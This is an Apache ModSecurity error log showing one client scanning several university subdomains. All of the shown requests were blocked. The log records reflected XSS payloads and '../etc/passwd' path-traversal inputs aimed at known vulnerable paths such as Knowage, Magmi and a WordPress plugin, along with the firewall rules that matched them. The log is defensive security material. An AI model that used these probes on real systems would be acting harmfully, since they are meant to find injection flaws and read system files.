[Tue Aug 29 11:54:14.653623 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAAoGFkIAAAAE"]
[Tue Aug 29 11:54:14.663652 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAAox7RsAAAAN"]
[Tue Aug 29 11:54:14.667792 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAApa-B8AAAAg"]
[Tue Aug 29 11:54:14.668290 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAApLWqEAAAAI"]
[Tue Aug 29 11:54:14.677383 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAAo2m-YAAAAA"]
[Tue Aug 29 11:54:14.682771 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApk-TUAAAAn"]
[Tue Aug 29 11:54:14.683583 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApbUR0AAAAh"]
[Tue Aug 29 11:54:14.684155 2023] [:error] [pid 2653] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApd2GMAAAAi"]
[Tue Aug 29 11:54:14.701664 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAApgAyQAAAAH"]
[Tue Aug 29 11:54:14.709342 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAAolKgMAAAAe"]
[Tue Aug 29 11:54:14.709499 2023] [:error] [pid 2658] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAApilykAAAAl"]
[Tue Aug 29 11:54:15.545530 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAApV20wAAAAJ"]
[Tue Aug 29 11:54:15.547014 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAApmXtAAAAAp"]
[Tue Aug 29 11:54:15.551965 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO1598Co-f0AAApk-TcAAAAn"]
[Tue Aug 29 11:54:15.553018 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO1598Co-f0AAAnHQwUAAAAT"]
[Tue Aug 29 11:54:15.557324 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAAo2m-gAAAAA"]
[Tue Aug 29 11:54:15.557906 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAApbUR8AAAAh"]
[Tue Aug 29 11:54:15.565728 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAAox7R4AAAAN"]
[Tue Aug 29 11:54:16.575695 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAAoGFkYAAAAE"]
[Tue Aug 29 11:54:16.598821 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAAoUJikAAAAB"]
[Tue Aug 29 11:54:16.600338 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAApk-ToAAAAn"]
[Tue Aug 29 11:54:16.607361 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAApWY3AAAAAM"]
[Tue Aug 29 11:54:16.614501 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAApZHTkAAAAf"]
[Tue Aug 29 11:54:16.628533 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAAoZ6a4AAAAK"]
[Tue Aug 29 11:54:16.640449 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAApmXtYAAAAp"]
[Tue Aug 29 11:54:16.783671 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAApWY3MAAAAM"]
[Tue Aug 29 11:54:16.808594 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAAoUJi0AAAAB"]
[Tue Aug 29 11:54:16.809406 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAApk-T4AAAAn"]
[Tue Aug 29 11:54:17.556875 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@cCo-f0AAApZHT4AAAAf"]
[Tue Aug 29 11:54:17.654565 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO15@cCo-f0AAAo2nAAAAAAA"]
[Tue Aug 29 11:54:18.686157 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@sCo-f0AAAo2nAUAAAAA"]
[Tue Aug 29 11:54:20.823601 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAAoAk7gAAAAC"]
